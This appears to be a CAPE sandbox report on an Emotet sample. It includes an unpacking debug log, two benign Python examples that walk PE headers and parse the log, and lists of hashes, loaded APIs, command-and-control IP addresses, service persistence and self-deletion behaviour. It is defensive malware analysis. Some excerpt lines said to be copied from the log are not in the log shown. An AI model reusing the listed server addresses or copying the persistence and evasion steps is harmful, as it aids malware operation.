2019-02-11 19:32:17,078 [root] DEBUG: SetInitialWriteBreakpoint: AllocationBase: 0x200000, AllocationSize: 0x10000, ThreadId: 0x8ac
2019-02-11 19:32:17,094 [root] DEBUG: SetDebugRegister: Setting breakpoint 0 hThread=0xac, Size=0x2, Address=0x200000 and Type=0x1.
2019-02-11 19:32:17,094 [root] DEBUG: SetBreakpoint: Set bp 0 type 1 at address 0x200000, size 2 with Callback 0x74943100, ThreadHandle = 0xac.
2019-02-11 19:32:17,094 [root] DEBUG: SetInitialWriteBreakpoint: Breakpoint 0 set write on word at base address: 0x200000
2019-02-11 19:32:17,094 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x1e177b
2019-02-11 19:32:17,109 [root] DEBUG: BaseAddressWriteCallback: Breakpoint 0 at Address 0x200000.
2019-02-11 19:32:17,109 [root] DEBUG: BaseAddressWriteCallback: byte written to 0x200000: 0x0.
2019-02-11 19:32:17,109 [root] DEBUG: ContextSetDebugRegister: Setting breakpoint 1 within Context, Size=0x0, Address=0x200000 and Type=0x0.
2019-02-11 19:32:17,109 [root] DEBUG: ContextSetBreakpoint: Call to ContextSetDebugRegister succeeded.
2019-02-11 19:32:17,109 [root] DEBUG: BaseAddressWriteCallback: Execution breakpoint 1 set base address: 0x200000, AllocationBaseExecBpSet = 1 (EIP = 0x1e177b)
2019-02-11 19:32:17,109 [root] DEBUG: BaseAddressWriteCallback executed successfully.
2019-02-11 19:32:17,141 [root] DEBUG: ProtectionHandler: Address: 0x251000, RegionSize: 0xf744
2019-02-11 19:32:17,141 [root] DEBUG: ProtectionHandler: attempting CAPE dump on region: 0x200000.
2019-02-11 19:32:17,141 [root] DEBUG: DumpPEsInRange: Scanning range 0x250000 - 0x260000.
2019-02-11 19:32:17,141 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0x250000
2019-02-11 19:32:17,141 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-02-11 19:32:17,141 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x250000
2019-02-11 19:32:17,141 [root] DEBUG: DumpProcess: Module entry point VA is 0x25f5e0
2019-02-11 19:32:17,141 [root] INFO: Added new CAPE file to list with path: C:\eqetkxw\CAPE\2224_14117122311122019
2019-02-11 19:32:17,157 [root] DEBUG: DumpProcess: Module image dump success
2019-02-11 19:32:17,157 [root] DEBUG: DumpPEsInRange: Dumped PE image from 0x250000.
2019-02-11 19:32:17,187 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x250001-0x260000.
2019-02-11 19:32:17,187 [root] DEBUG: ProtectionHandler: PE image(s) detected and dumped.
2019-02-11 19:32:17,187 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0x200000 - 0x210000.
2019-02-11 19:32:17,187 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoint 0 address 0x200000.
2019-02-11 19:32:17,187 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoint 1 address 0x200000.
2019-02-11 19:32:17,187 [root] DEBUG: DumpPEsInRange: Scanning range 0x250000 - 0x260000.
2019-02-11 19:32:17,187 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0x250000
2019-02-11 19:32:17,187 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-02-11 19:32:17,203 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x250000
2019-02-11 19:32:17,203 [root] DEBUG: DumpProcess: Module entry point VA is 0x25f5e0
2019-02-11 19:32:17,203 [root] INFO: Added new CAPE file to list with path: C:\eqetkxw\CAPE\2224_20417122311122019
2019-02-11 19:32:17,203 [root] DEBUG: DumpProcess: Module image dump success
2019-02-11 19:32:17,203 [root] DEBUG: DumpPEsInRange: Dumped PE image from 0x250000.
2019-02-11 19:32:17,219 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x250001-0x260000.
2019-02-11 19:32:17,219 [root] DEBUG: ProtectionHandler: Found and dumped PE image(s).
2019-02-11 19:32:17,219 [root] DEBUG: SetDebugRegister: Setting breakpoint 0 hThread=0xac, Size=0x0, Address=0x251000 and Type=0x0.
2019-02-11 19:32:17,219 [root] DEBUG: SetBreakpoint: Set bp 0 type 0 at address 0x251000, size 0 with Callback 0x74942e90, ThreadHandle = 0xac.
2019-02-11 19:32:17,219 [root] DEBUG: ProtectionHandler: Execution breakpoint 0 set base address: 0x251000, AllocationBaseExecBpSet = 1
2019-02-11 19:32:17,234 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x251000
2019-02-11 19:32:17,234 [root] DEBUG: MidPageExecCallback: Breakpoint 0 at Address 0x251000.
2019-02-11 19:32:17,234 [root] DEBUG: MidPageExecCallback: Debug: About to scan region for a PE image (base 0x250000, size 0x10744).
2019-02-11 19:32:17,234 [root] DEBUG: DumpPEsInRange: Scanning range 0x250000 - 0x260744.
2019-02-11 19:32:17,250 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0x250000
2019-02-11 19:32:17,250 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-02-11 19:32:17,250 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x250000
2019-02-11 19:32:17,250 [root] DEBUG: DumpProcess: Module entry point VA is 0x25f5e0
2019-02-11 19:32:17,250 [root] INFO: Added new CAPE file to list with path: C:\eqetkxw\CAPE\2224_49353382311122019
2019-02-11 19:32:17,250 [root] DEBUG: DumpProcess: Module image dump success
2019-02-11 19:32:17,250 [root] DEBUG: DumpPEsInRange: Dumped PE image from 0x250000.
2019-02-11 19:32:17,250 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x250001-0x260744.
2019-02-11 19:32:17,250 [root] DEBUG: MidPageExecCallback: PE image(s) detected and dumped.
2019-02-11 19:32:17,250 [root] DEBUG: MidPageExecCallback executed successfully.
2019-02-11 19:32:17,250 [root] INFO: Notified of termination of process with pid 2736.
2019-02-11 19:32:17,266 [root] WARNING: Unable to open termination event for pid 2736.
2019-02-11 19:32:17,266 [root] INFO: Notified of termination of process with pid 2832.
2019-02-11 19:32:17,608 [root] INFO: Process with pid 2832 has terminated
2019-02-11 19:32:17,608 [root] INFO: Process with pid 2736 has terminated
2019-02-11 19:35:37,867 [root] INFO: Analysis timeout hit (200 seconds), terminating analysis.
2019-02-11 19:35:37,867 [root] INFO: Created shutdown mutex.
2019-02-11 19:35:38,881 [root] INFO: Setting terminate event for process 2224.
2019-02-11 19:35:39,394 [root] INFO: Shutting down package.
2019-02-11 19:35:39,394 [root] INFO: Stopping auxiliary modules.
2019-02-11 19:35:39,394 [root] INFO: Finishing auxiliary modules.
2019-02-11 19:35:39,394 [root] INFO: Shutting down pipe server and dumping dropped files.
2019-02-11 19:35:39,394 [root] INFO: Analysis completed.
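The log above records the Extraction package following a freshly written PE header field by field: a write breakpoint on the first two bytes of each new allocation (waiting for "MZ"), then on e_lfanew at base+0x3c, then on the PE signature at base+e_lfanew (0xc8 here), then on AddressOfEntryPoint at base+e_lfanew+0x28 (0xf0 here), and finally an execution breakpoint at the entry point itself. The four EntryPointWriteCallback hits (0x13007f, then 0x131f7f three times) are what a byte-at-a-time write of the DWORD 0x00001f7f looks like through a write breakpoint. The region at 0x130000 was then rejected with "Characteristics bad" and dumped as raw memory, while the image at 0x2a0000 passed and was dumped as a PE. The Python below is an added example, not CAPE's own code: it walks the same header fields over a constructed minimal image (build_region is constructed here; the offsets are the standard PE layout), reproduces the breakpoint address sequence, and shows the rejection path.

```python
"""Walk the PE header fields that the Extraction package's write breakpoints follow.

Added illustration, not CAPE code. The offsets are the standard PE layout; the
sample image built by build_region() is constructed here so the walk runs offline.
"""
import struct

IMAGE_DOS_SIGNATURE = b"MZ"
IMAGE_NT_SIGNATURE = b"PE\x00\x00"
IMAGE_FILE_EXECUTABLE_IMAGE = 0x0002     # must be set, or a scanner rejects the header
E_LFANEW_OFFSET = 0x3C                   # IMAGE_DOS_HEADER.e_lfanew
# IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
# NumberOfSymbols, SizeOfOptionalHeader, Characteristics (20 bytes)
FILE_HEADER_FMT = "<HHIIIHH"
# AddressOfEntryPoint sits 0x28 bytes after the PE signature:
# 4 (Signature) + 20 (FILE_HEADER) + 16 (Magic .. SizeOfUninitializedData)
ENTRYPOINT_OFFSET_IN_NT = 0x28


def watch_addresses(base, e_lfanew):
    """The three addresses a header-following write breakpoint visits in turn:
    e_lfanew, the PE signature, and AddressOfEntryPoint."""
    return (base + E_LFANEW_OFFSET,
            base + e_lfanew,
            base + e_lfanew + ENTRYPOINT_OFFSET_IN_NT)


def walk_pe_headers(region, base):
    """Validate an in-memory image the way a PE scanner does and return the
    fields it keys on; raises ValueError with the reason a region is rejected."""
    if len(region) < E_LFANEW_OFFSET + 4 or region[:2] != IMAGE_DOS_SIGNATURE:
        raise ValueError("no MZ header")
    e_lfanew = struct.unpack_from("<I", region, E_LFANEW_OFFSET)[0]
    if e_lfanew + ENTRYPOINT_OFFSET_IN_NT + 4 > len(region):
        raise ValueError("e_lfanew points outside the region")
    if region[e_lfanew:e_lfanew + 4] != IMAGE_NT_SIGNATURE:
        raise ValueError("no PE signature")
    machine, nsections, _, _, _, _, characteristics = struct.unpack_from(
        FILE_HEADER_FMT, region, e_lfanew + 4)
    if not characteristics & IMAGE_FILE_EXECUTABLE_IMAGE:
        raise ValueError("Characteristics bad")    # the verdict logged for 0x130000 above
    entry_rva = struct.unpack_from("<I", region, e_lfanew + ENTRYPOINT_OFFSET_IN_NT)[0]
    return {
        "e_lfanew": e_lfanew,
        "machine": machine,
        "sections": nsections,
        "characteristics": characteristics,
        "entry_rva": entry_rva,
        "entry_va": base + entry_rva,
        "watch_addresses": watch_addresses(base, e_lfanew),
    }


def replay_entrypoint_writes(base, writes):
    """Apply single-byte writes (offset, value) to a zeroed AddressOfEntryPoint
    field and return the entry VA after each one, i.e. where an execution
    breakpoint on the entry point is moved after every write hit."""
    field = bytearray(4)
    moves = []
    for offset, value in writes:
        field[offset] = value
        moves.append(base + struct.unpack("<I", field)[0])
    return moves


def build_region(entry_rva, characteristics, e_lfanew=0xC8, size=0x1000):
    """Constructed minimal image: MZ stub, e_lfanew, PE signature, FILE_HEADER
    and the first OPTIONAL_HEADER fields up to AddressOfEntryPoint."""
    img = bytearray(size)
    img[0:2] = IMAGE_DOS_SIGNATURE
    struct.pack_into("<I", img, E_LFANEW_OFFSET, e_lfanew)
    img[e_lfanew:e_lfanew + 4] = IMAGE_NT_SIGNATURE
    struct.pack_into(FILE_HEADER_FMT, img, e_lfanew + 4,
                     0x014C, 3, 0, 0, 0, 0xE0, characteristics)   # i386, 3 sections, PE32 opt hdr
    struct.pack_into("<H", img, e_lfanew + 0x18, 0x10B)           # Magic = PE32
    struct.pack_into("<I", img, e_lfanew + ENTRYPOINT_OFFSET_IN_NT, entry_rva)
    return bytes(img)


if __name__ == "__main__":
    base = 0x130000
    good = build_region(0x1F7F, IMAGE_FILE_EXECUTABLE_IMAGE | 0x0100)
    print(walk_pe_headers(good, base))
    print([hex(a) for a in replay_entrypoint_writes(base, [(0, 0x7F), (1, 0x1F), (2, 0), (3, 0)])])
    try:
        walk_pe_headers(build_region(0x1F7F, 0x0100), base)
    except ValueError as err:
        print("rejected:", err)
```

With base 0x130000 and e_lfanew 0xc8 the watch addresses come out as 0x13003c, 0x1300c8 and 0x1300f0, matching the breakpoint addresses in the log, and the replayed byte writes move the entry breakpoint 0x13007f then 0x131f7f, matching the EntryPointWriteCallback lines. A region whose Characteristics lack IMAGE_FILE_EXECUTABLE_IMAGE is rejected exactly as the scanner rejected 0x130000, which is why that region only appears as a raw DumpMemory file rather than a rebuilt PE.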
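Reading a log like the one above by hand is error-prone because the in-process DEBUG lines carry no PID: only the "Monitor successfully loaded" and "Announced ... pid" lines, and the PID prefix on each CAPE output file name, tie events to a process. The following added example (not CAPE's own tooling) parses an excerpt copied from the log on this page and reconstructs, per process, the allocations that were watched, which dumps were raw memory versus rebuilt PE images, how many regions the scanner rejected, and which processes were still alive when the 200-second timeout fired. Attributing allocation lines to the most recently loaded monitor is a heuristic that holds for this sequential log; the PID in the CAPE file name is the authoritative link for dumps.

```python
"""Reconstruct the per-process unpacking timeline from a CAPE Extraction analysis log.

Added example, not CAPE code. The excerpt below is copied from the analysis log on this
page; it is a raw string because the CAPE paths contain backslash-digit sequences that
Python would otherwise read as escapes.
"""
import re
from dataclasses import dataclass, field

LOG_EXCERPT = r"""
2019-02-11 19:32:16,299 [root] INFO: Announced 32-bit process name: dafpanes.exe pid: 2736
2019-02-11 19:32:16,391 [root] INFO: Monitor successfully loaded in process with pid 2736.
2019-02-11 19:32:16,391 [root] DEBUG: NtAllocateVirtualMemory hook, BaseAddress:0x130000, RegionSize: 0x1a000.
2019-02-11 19:32:16,641 [root] DEBUG: ScanForDisguisedPE: Characteristics bad.
2019-02-11 19:32:16,641 [root] DEBUG: NtAllocateVirtualMemory hook, BaseAddress:0x250000, RegionSize: 0x10000.
2019-02-11 19:32:16,657 [root] DEBUG: NtAllocateVirtualMemory hook: dumping memory range at 0x130000.
2019-02-11 19:32:16,657 [root] DEBUG: DumpMemory: CAPE output file successfully created: C:\eqetkxw\CAPE\2736_65816122311122019
2019-02-11 19:32:16,673 [root] INFO: Added new CAPE file to list with path: C:\eqetkxw\CAPE\2736_65816122311122019
2019-02-11 19:32:16,688 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x2a0000
2019-02-11 19:32:16,703 [root] INFO: Added new CAPE file to list with path: C:\eqetkxw\CAPE\2736_68916122311122019
2019-02-11 19:32:16,703 [root] DEBUG: DumpPEsInRange: Dumped PE image from 0x2a0000.
2019-02-11 19:32:16,891 [root] INFO: Announced 32-bit process name: dafpanes.exe pid: 2224
2019-02-11 19:32:16,937 [root] INFO: Monitor successfully loaded in process with pid 2224.
2019-02-11 19:32:16,937 [root] DEBUG: NtAllocateVirtualMemory hook, BaseAddress:0x1e0000, RegionSize: 0x1a000.
2019-02-11 19:32:17,141 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x250000
2019-02-11 19:32:17,141 [root] INFO: Added new CAPE file to list with path: C:\eqetkxw\CAPE\2224_14117122311122019
2019-02-11 19:32:17,608 [root] INFO: Process with pid 2736 has terminated
2019-02-11 19:35:37,867 [root] INFO: Analysis timeout hit (200 seconds), terminating analysis.
"""

HEX = r"(0x[0-9a-fA-F]+)"
RE_ANNOUNCE = re.compile(r"Announced 32-bit process name: (\S+) pid: (\d+)")
RE_MONITOR = re.compile(r"Monitor successfully loaded in process with pid (\d+)")
RE_ALLOC = re.compile(r"NtAllocateVirtualMemory hook, BaseAddress:" + HEX + r", RegionSize: " + HEX)
RE_PE_PARSE = re.compile(r"Instantiating PeParser with address: " + HEX)
RE_RAW_DUMP = re.compile(r"dumping memory range at " + HEX)
RE_CAPE_FILE = re.compile(r"Added new CAPE file to list with path: (\S+)")
RE_PID_FROM_PATH = re.compile(r"[\\/](\d+)_\d+$")   # CAPE names dumps <pid>_<timestamp>
RE_BAD_SCAN = re.compile(r"ScanForDisguisedPE: Characteristics bad")
RE_TERM = re.compile(r"Process with pid (\d+) has terminated")
RE_TIMEOUT = re.compile(r"Analysis timeout hit")


@dataclass
class ProcessTrace:
    pid: int
    image: str = ""
    allocations: list = field(default_factory=list)   # (base, size)
    dumps: list = field(default_factory=list)         # (kind, address, path); kind is "pe" or "raw"
    bad_scans: int = 0
    terminated: bool = False


def parse_extraction_log(text):
    """Return ({pid: ProcessTrace}, [pids still alive at timeout])."""
    procs = {}
    current = None    # PID whose monitor reported in most recently (heuristic for unattributed lines)
    pending = None    # (kind, address) of the dump whose file path has not been logged yet
    timed_out = False

    def trace(pid):
        return procs.setdefault(pid, ProcessTrace(pid))

    for line in text.splitlines():
        if m := RE_ANNOUNCE.search(line):
            trace(int(m.group(2))).image = m.group(1)
        elif m := RE_MONITOR.search(line):
            current = int(m.group(1))
            trace(current)
        elif m := RE_ALLOC.search(line):
            if current is not None:
                trace(current).allocations.append((int(m.group(1), 16), int(m.group(2), 16)))
        elif RE_BAD_SCAN.search(line):
            if current is not None:
                trace(current).bad_scans += 1
        elif m := RE_PE_PARSE.search(line):
            pending = ("pe", int(m.group(1), 16))
        elif m := RE_RAW_DUMP.search(line):
            pending = ("raw", int(m.group(1), 16))
        elif m := RE_CAPE_FILE.search(line):
            path = m.group(1)
            owner = RE_PID_FROM_PATH.search(path)
            pid = int(owner.group(1)) if owner else current
            kind, addr = pending if pending else ("unknown", None)
            trace(pid).dumps.append((kind, addr, path))
            pending = None
        elif m := RE_TERM.search(line):
            trace(int(m.group(1))).terminated = True
        elif RE_TIMEOUT.search(line):
            timed_out = True

    survivors = sorted(p.pid for p in procs.values() if not p.terminated) if timed_out else []
    return procs, survivors


if __name__ == "__main__":
    procs, survivors = parse_extraction_log(LOG_EXCERPT)
    for p in sorted(procs.values(), key=lambda t: t.pid):
        print(f"pid {p.pid} ({p.image}) terminated={p.terminated} bad_scans={p.bad_scans}")
        for base, size in p.allocations:
            print(f"  alloc {base:#x} size {size:#x}")
        for kind, addr, path in p.dumps:
            print(f"  dump {kind:<3} {addr:#x} -> {path}")
    print("alive at timeout:", survivors)
```

On the excerpt this yields two dafpanes.exe traces: pid 2736 with a raw dump of the rejected 0x130000 region and a PE dump from 0x2a0000, and pid 2224 with a PE dump from 0x250000 and no termination line before the timeout, which is consistent with the "Setting terminate event for process 2224" line at the end of the log. If the full log were fed in instead, the per-PID bad_scans and dump counts would show the same two-stage pattern (reject the first-stage buffer, rebuild the second-stage image) repeating in each spawned instance.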

MalScore

10.0

Emotet

Machine

Name target-01
Label target-01
Manager ESX
Started On 2019-02-11 19:32:08
Shutdown On 2019-02-11 19:35:53

File Details

File Name 58273d0d9c7700fa13dc63096b08967ae926db6d|EYblPodL.exe
File Size 470528 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 656e02696cf6c513ad72c009e9d337b5
SHA1 58273d0d9c7700fa13dc63096b08967ae926db6d
SHA256 f9604051cf7518348b294c2afdc47d786cac4f51d503b26f0731dc7deee72369
SHA512 0748cbe1f892db1fd2bd0a257f269438663449b1342af31e183304e48c45e61f3b54c9bbc2e3b0634563465890d441f5265c7c7b5dbbc7929bbcaee492ed9520
CRC32 2345913F
Ssdeep 3072:Ich6OhgjArPuHPhYR/UctWYNqHfkU81o4U5oij9Fk0lNJCqfcWEj6bl13wa0gRUN:/q0X0vwa0PXqWbZR/
TrID
  • 34.2% (.DLL) Win32 Dynamic Link Library (generic) (6578/25/2)
  • 23.4% (.EXE) Win32 Executable (generic) (4508/7/1)
  • 10.7% (.EXE) Win16/32 Executable Delphi generic (2072/23)
  • 10.5% (.EXE) OS/2 Executable (generic) (2029/13)
  • 10.4% (.EXE) Generic Win/DOS Executable (2002/3)
ClamAV None matched
Yara None matched
CAPE Yara None matched

Signatures

Behavioural detection: Executable code extraction
Yara rule detections observed from a process memory dump/dropped files/CAPE
Hit: PID 2932 triggered the Yara rule 'Emotet'
Hit: PID 2832 triggered the Yara rule 'Emotet'
Mimics the system's user agent string for its own requests
Dynamic (imported) function loading detected
DynamicLoader: kernel32.dll/FreeConsole
DynamicLoader: kernel32.dll/lstrlenA
DynamicLoader: kernel32.dll/lstrcmpA
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/SetLastError
DynamicLoader: kernel32.dll/GetCurrentProcessId
DynamicLoader: kernel32.dll/GetCurrentProcess
DynamicLoader: USER32.dll/wsprintfA
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/LoadLibraryA
DynamicLoader: kernel32.dll/GetProcAddress
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/FreeConsole
DynamicLoader: kernel32.dll/lstrlenA
DynamicLoader: kernel32.dll/lstrcmpA
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/SetLastError
DynamicLoader: kernel32.dll/GetCurrentProcessId
DynamicLoader: kernel32.dll/GetCurrentProcess
DynamicLoader: USER32.dll/wsprintfA
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ole32.dll/CreateBindCtx
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoGetApartmentType
DynamicLoader: ole32.dll/CoRegisterInitializeSpy
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: comctl32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoGetMalloc
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_Size_ExW
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_ExW
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ADVAPI32.dll/InitializeSecurityDescriptor
DynamicLoader: ADVAPI32.dll/SetEntriesInAclW
DynamicLoader: ntmarta.dll/GetMartaExtensionInterface
DynamicLoader: ADVAPI32.dll/SetSecurityDescriptorDacl
DynamicLoader: ADVAPI32.dll/IsTextUnicode
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: shell32.dll/
DynamicLoader: ADVAPI32.dll/OpenThreadToken
DynamicLoader: propsys.dll/PSLookupPropertyHandlerCLSID
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: propsys.dll/PSCreatePropertyStoreFromObject
DynamicLoader: propsys.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: propsys.dll/PropVariantToStringAlloc
DynamicLoader: ole32.dll/PropVariantClear
DynamicLoader: propsys.dll/PSCreateMemoryPropertyStore
DynamicLoader: propsys.dll/PropVariantToBuffer
DynamicLoader: propsys.dll/PropVariantToUInt64
DynamicLoader: propsys.dll/PropVariantToBoolean
DynamicLoader: propsys.dll/InitPropVariantFromBuffer
DynamicLoader: ADVAPI32.dll/GetNamedSecurityInfoW
DynamicLoader: ADVAPI32.dll/TreeSetNamedSecurityInfoW
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ole32.dll/CoRevokeInitializeSpy
DynamicLoader: OLEAUT32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ADVAPI32.dll/UnregisterTraceGuids
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/LoadLibraryA
DynamicLoader: kernel32.dll/GetProcAddress
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/FreeConsole
DynamicLoader: kernel32.dll/lstrlenA
DynamicLoader: kernel32.dll/lstrcmpA
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/SetLastError
DynamicLoader: kernel32.dll/GetCurrentProcessId
DynamicLoader: kernel32.dll/GetCurrentProcess
DynamicLoader: USER32.dll/wsprintfA
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/LoadLibraryA
DynamicLoader: kernel32.dll/GetProcAddress
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/FreeConsole
DynamicLoader: kernel32.dll/lstrlenA
DynamicLoader: kernel32.dll/lstrcmpA
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/SetLastError
DynamicLoader: kernel32.dll/GetCurrentProcessId
DynamicLoader: kernel32.dll/GetCurrentProcess
DynamicLoader: USER32.dll/wsprintfA
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: CRYPTSP.dll/CryptAcquireContextW
DynamicLoader: CRYPTSP.dll/CryptImportKey
DynamicLoader: CRYPTSP.dll/CryptGenKey
DynamicLoader: CRYPTSP.dll/CryptCreateHash
DynamicLoader: CRYPTSP.dll/CryptDuplicateHash
DynamicLoader: CRYPTSP.dll/CryptEncrypt
DynamicLoader: CRYPTSP.dll/CryptExportKey
DynamicLoader: CRYPTSP.dll/CryptGetHashParam
DynamicLoader: CRYPTSP.dll/CryptDestroyHash
DynamicLoader: RASAPI32.dll/RasConnectionNotificationW
DynamicLoader: sechost.dll/NotifyServiceStatusChangeA
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: iphlpapi.DLL/GetAdaptersAddresses
DynamicLoader: DHCPCSVC.DLL/DhcpRequestParams
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: OLEAUT32.dll/
DynamicLoader: CRYPTSP.dll/CryptDecrypt
DynamicLoader: CRYPTSP.dll/CryptVerifySignatureW
Expresses interest in specific running processes
process: dafpanes.exe
process: sPVjc.exe
HTTP traffic contains suspicious features which may be indicative of malware related traffic
ip_hostname: HTTP connection was made to an IP address rather than domain name
suspicious_request: http://200.110.85.138:990/
Performs some HTTP requests
url: http://200.110.85.138:990/
Deletes its original binary from disk
Attempts to remove evidence of file being downloaded from the Internet
file: C:\Windows\SysWOW64\dafpanes.exe:Zone.Identifier
Installs itself for autorun at Windows startup
service name: dafpanes
service path: "C:\Windows\SysWOW64\dafpanes.exe"
CAPE detected the Emotet malware family
Creates a copy of itself
copy: C:\Windows\SysWOW64\dafpanes.exe
Drops a binary and executes it
binary: C:\Windows\SysWOW64\dafpanes.exe

Hosts

Direct IP Country Name
Y 64.32.70.194 [VT] Dominican Republic
Y 200.110.85.138 [VT] Ecuador
Y 187.131.137.216 [VT] Mexico
Y 174.84.250.37 [VT] United States

DNS

No domains contacted.


Summary

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{66742402-F9B9-11D1-A202-0000F81FEDEE}\UseInProcHandlerCache
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{66742402-F9B9-11D1-A202-0000F81FEDEE}\UseOutOfProcHandlerCache
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\AlwaysShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\NeverShowExt
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\MaxUndoItems
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Advanced\MaxUndoItems
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\ForceCopyACLWithFile
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoEncryptOnMove
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\dafpanes\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\dafpanes\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\dafpanes\WOW64
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Public
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir
